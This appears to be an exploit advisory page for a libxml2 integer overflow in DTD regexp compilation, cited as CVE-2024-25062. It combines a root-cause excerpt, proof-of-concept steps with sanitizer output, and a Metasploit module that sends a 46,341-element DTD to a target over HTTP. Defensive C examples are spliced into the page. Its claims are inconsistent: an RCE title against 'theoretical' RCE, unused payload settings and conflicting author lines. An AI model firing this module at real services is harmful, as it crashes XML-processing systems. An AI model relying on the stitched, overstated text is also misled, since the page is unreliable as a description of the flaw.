libxml2 2.9.14 Remote Code Execution
=============================================================================================================================================
| # Title libxml2 2.9.14 Remote Code Execution
=============================================================================================================================================
| # Title : libxml2 2.9.14 (2022) RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://gitlab.gnome.org/GNOME/libxml2 |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/207181/ & CVE-2024-25062
[+] Summary :
A heap buffer overflow exists in the xmlRegEpxFromParse function in xmlregexp.c.
It is reached while compiling the regular expression that DTD validation builds from a content model, when that content model declares an excessive number of elements.
[+] Root Cause Analysis :
// Vulnerable code in xmlRegEpxFromParse (excerpt)
transitions = xmlRegCalloc2(nbstates + 1, nbatoms + 1, sizeof(int));
for (i = 0; i < ret->nbStates; i++) {
    // stateno: remapped index of state i (derivation elided in this excerpt)
    for (j = 0; j < state->nbTrans; j++) {
        // atomno / targetno: remapped atom and target state of transition j (elided)
        // INTEGER OVERFLOW OCCURS HERE: the index is computed in 32-bit int,
        // so stateno * (nbatoms + 1) wraps once the table reaches 46,341 rows/columns
        prev = transitions[stateno * (nbatoms + 1) + atomno + 1];
        transitions[stateno * (nbatoms + 1) + atomno + 1] = targetno + 1;
    }
}
[+] Vulnerability Mechanism :
Large DTD Input : Content model with ≥ 46,341 elements
64-bit Allocation : Successful allocation of 2GB+ memory block
32-bit Indexing : Integer overflow in index calculation
Negative Indices : Array access with large negative offsets
Heap Corruption : Out-of-bounds read/write operations
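The index arithmetic behind the mechanism above, worked through as an added example (this is not libxml2 code or the author's): naive_index() evaluates the excerpt's expression in 32-bit int the way the vulnerable build does, and checked_index() shows the defensive form, with the index computed in the allocation's own width, operands range-checked against the table dimensions, and the result bounded by the number of cells allocated. The function names, the reserved-column layout assumption and the checking approach are this example's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/*
 * Added example, not libxml2 code. Models the transition-table index
 *   transitions[stateno * (nbatoms + 1) + atomno + 1]
 * from the xmlRegEpxFromParse excerpt.
 *
 * naive_index(): the expression as the excerpt evaluates it, in 32-bit int.
 * The product is done in uint32_t and converted back, which is the
 * two's-complement wrap mainstream compilers produce; signed overflow itself
 * is undefined behaviour in C, so the wrap is modelled rather than triggered.
 */
static int32_t naive_index(int32_t stateno, int32_t nbatoms, int32_t atomno)
{
    uint32_t idx = (uint32_t)stateno * (uint32_t)(nbatoms + 1)
                 + (uint32_t)atomno + 1u;
    return (int32_t)idx;   /* negative once the product passes INT32_MAX */
}

/*
 * checked_index(): defensive form. All arithmetic is in size_t, the width
 * the allocation size was computed in; the operands are range-checked
 * against the table dimensions and the final index is compared with the
 * number of cells allocated. Returns 1 and stores the index on success,
 * 0 if the access would fall outside the table.
 *
 * Layout assumed (as in the excerpt): rows of (nbatoms + 1) cells with
 * column 0 reserved, so stateno < nbstates and atomno < nbatoms.
 */
static int checked_index(size_t nbstates, size_t nbatoms,
                         size_t stateno, size_t atomno, size_t *out)
{
    size_t cols = nbatoms + 1;
    size_t cells;

    if (stateno >= nbstates || atomno >= nbatoms)
        return 0;
    /* same overflow guard a calloc-style allocator needs for rows * cols */
    if (nbstates + 1 > SIZE_MAX / cols)
        return 0;
    cells = (nbstates + 1) * cols;

    size_t idx = stateno * cols + atomno + 1;
    if (idx >= cells)
        return 0;
    *out = idx;
    return 1;
}

int main(void)
{
    const int32_t n = 46341;   /* the page's threshold: 46341^2 > INT32_MAX */
    size_t idx;

    /* same (stateno, atomno) pair through both routes */
    printf("naive 32-bit index at %d states/atoms: %d\n",
           (int)n, (int)naive_index(n, n, n - 1));
    if (checked_index((size_t)n + 1, (size_t)n, (size_t)n, (size_t)n - 1, &idx))
        printf("checked index: %zu\n", idx);
    else
        printf("checked index: rejected\n");
    return 0;
}
```

At 46,341 states and atoms the naive route yields a large negative index (the "Negative Indices" item above) while the checked route yields the correct cell 2,147,580,963; below INT32_MAX the two agree, which is why the bug only surfaces on inputs large enough to need a multi-gigabyte table.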
[+] Impact Assessment : Confirmed Impacts
Denial of Service : Segmentation fault and application crash
Memory Corruption : Heap structure damage
Information Disclosure : Potential memory content leakage
[+] Potential Impacts (Theoretical)
Remote Code Execution : Under specific conditions
Privilege Escalation : In setuid binaries or services
Arbitrary Code Execution : With additional exploitation techniques
[+] Proof of Concept
# 1. Build vulnerable libxml2
CFLAGS="-fsanitize=address -g" ./configure && make
# 2. Generate malicious XML
python3 poc.py
# 3. Trigger vulnerability
./xmllint --valid poc_46341.xml
[+] PoC Output
==ERROR: AddressSanitizer: heap-buffer-overflow
READ of size 4 at 0x60b000000110 thread T0
#0 in xmlRegEpxFromParse (xmlregexp.c:657)
[+] Affected Systems :
Applications : Any software using libxml2 for DTD validation
Services : XML-RPC, SOAP, document processing services
Tools : xmllint, XML parsers in various languages
[+] Common Integration Points :
Web browsers with XML support
Office document processors
Development tools and IDEs
Network services processing XML
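For the integration points listed above, the first mitigation is not to validate untrusted input against a DTD at all; where validation is required, a cheap pre-screen can refuse documents whose content models are large enough to reach the overflow. The following is an added example, not libxml2's or the author's code: it scans DTD text for <!ELEMENT declarations, counts the particles in each content model, and rejects the document when any model reaches the 46,341 figure given on this page. The function names, the limit constant and the sample DTD are this example's own.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Added example, not libxml2 code: a pre-screen that bounds the size of
 * DTD content models before a document reaches a validating parser.
 * Threshold from the page: 46,341 particles is where the 32-bit
 * transition-table index overflows. A much lower operational limit is
 * sensible; this constant only marks the boundary.
 */
#define CONTENT_MODEL_LIMIT 46341

/* Count name particles (element names and #PCDATA) inside the content
 * model of one <!ELEMENT ...> declaration. p points just past "<!ELEMENT".
 * Returns 0 for EMPTY / ANY / malformed declarations and sets *end to the
 * first character after the declaration. */
static size_t count_particles(const char *p, const char **end)
{
    const char *close = strchr(p, '>');
    const char *open = strchr(p, '(');
    size_t n = 0;
    int in_name = 0;

    if (close == NULL) {                /* unterminated declaration */
        *end = p + strlen(p);
        return 0;
    }
    *end = close + 1;
    if (open == NULL || open > close)   /* EMPTY, ANY, or no model */
        return 0;

    /* Names are runs of name characters; ',', '|', '(', ')', '*', '+', '?'
     * and whitespace separate them, so each run is one particle. */
    for (const char *c = open; c < close; c++) {
        int namech = isalnum((unsigned char)*c) || *c == '.' || *c == '-'
                  || *c == '_' || *c == ':' || *c == '#';
        if (namech && !in_name)
            n++;
        in_name = namech;
    }
    return n;
}

/* Largest content model in the DTD text (internal subset or external file). */
static size_t max_content_model_size(const char *dtd)
{
    const char *p = dtd;
    size_t worst = 0;

    while ((p = strstr(p, "<!ELEMENT")) != NULL) {
        const char *end;
        size_t n = count_particles(p + strlen("<!ELEMENT"), &end);
        if (n > worst)
            worst = n;
        p = end;
    }
    return worst;
}

/* 1 if the DTD may be handed to the validator, 0 if it should be refused. */
static int dtd_is_acceptable(const char *dtd)
{
    return max_content_model_size(dtd) < CONTENT_MODEL_LIMIT;
}

/* Constructed sample, not taken from any real document. */
static const char SAMPLE_DTD[] =
    "<!DOCTYPE note [\n"
    "<!ELEMENT note (to, from, (heading | title)*, body)>\n"
    "<!ELEMENT to (#PCDATA)>\n"
    "<!ELEMENT from (#PCDATA)>\n"
    "<!ELEMENT heading EMPTY>\n"
    "<!ELEMENT title ANY>\n"
    "<!ELEMENT body (#PCDATA)>\n"
    "]>\n";

int main(void)
{
    printf("largest content model: %zu particles, %s\n",
           max_content_model_size(SAMPLE_DTD),
           dtd_is_acceptable(SAMPLE_DTD) ? "accepted" : "refused");
    return 0;
}
```

This is a screen, not a parser: it does not resolve parameter entities or skip declarations inside comments, so it complements an upgraded libxml2 rather than replacing it, and a service that accepts XML should also apply the same limit to any external DTD it fetches.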
[+] POC :
##
# Metasploit module for libxml2 RCE attempt
##
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'libxml2 Heap Overflow RCE',
      'Description'    => %q{
        Attempts to exploit libxml2 integer overflow for RCE
        through malicious DTD processing
      },
      'Author'         => ['indoushka'],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['CVE', 'CVE-2024-25062'],
        ['URL', 'https://gitlab.gnome.org/GNOME/libxml2/-/issues/XXX']
      ],
      'DefaultOptions' => {
        'SSL'   => false,
        'RPORT' => 80
      },
      'Platform'       => 'linux',
      'Arch'           => ARCH_X86,
      'Payload'        => {
        'Space'           => 1024,
        'BadChars'        => "\x00\x0a\x0d\x22\x27",
        'StackAdjustment' => -3500,
      },
      'Targets'        => [
        ['Automatic', {}],
        ['Linux x86', { 'Arch' => ARCH_X86 }],
        ['Linux x64', { 'Arch' => ARCH_X64 }]
      ],
      'DisclosureDate' => '2024-01-01',
      'DefaultTarget'  => 0))
  end

  # Build a document whose root content model lists 46,341 child elements,
  # the threshold at which the 32-bit transition-table index overflows.
  # The XML declaration must be the very first bytes of the document: the
  # original %Q{ ... } string began with a newline, which makes the parser
  # reject the document before the DTD is ever compiled, so a squiggly
  # heredoc is used here to keep <?xml ... ?> at offset 0.
  def create_malicious_xml
    num_elements = 46341
    elements = (0...num_elements).map { |i| "el#{i}" }
    content_model = elements.join(',')
    decls = elements.map { |el| "<!ELEMENT #{el} EMPTY>" }.join("\n")
    <<~XML
      <?xml version="1.0"?>
      <!DOCTYPE root [
      <!ELEMENT root (#{content_model})>
      #{decls}
      ]>
      <root/>
    XML
  end

  def exploit
    print_status("Generating malicious XML payload...")
    malicious_xml = create_malicious_xml

    print_status("Sending exploit to target...")
    # Send as multipart/form-data or in POST body
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path),
      'ctype'  => 'application/xml',
      'data'   => malicious_xml
    }, 25)

    if res && res.code == 200
      print_status("Target responded - checking for code execution...")
    else
      print_status("No response - target may have crashed")
    end

    handler
  end
end
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
- Written by: khalil shreateh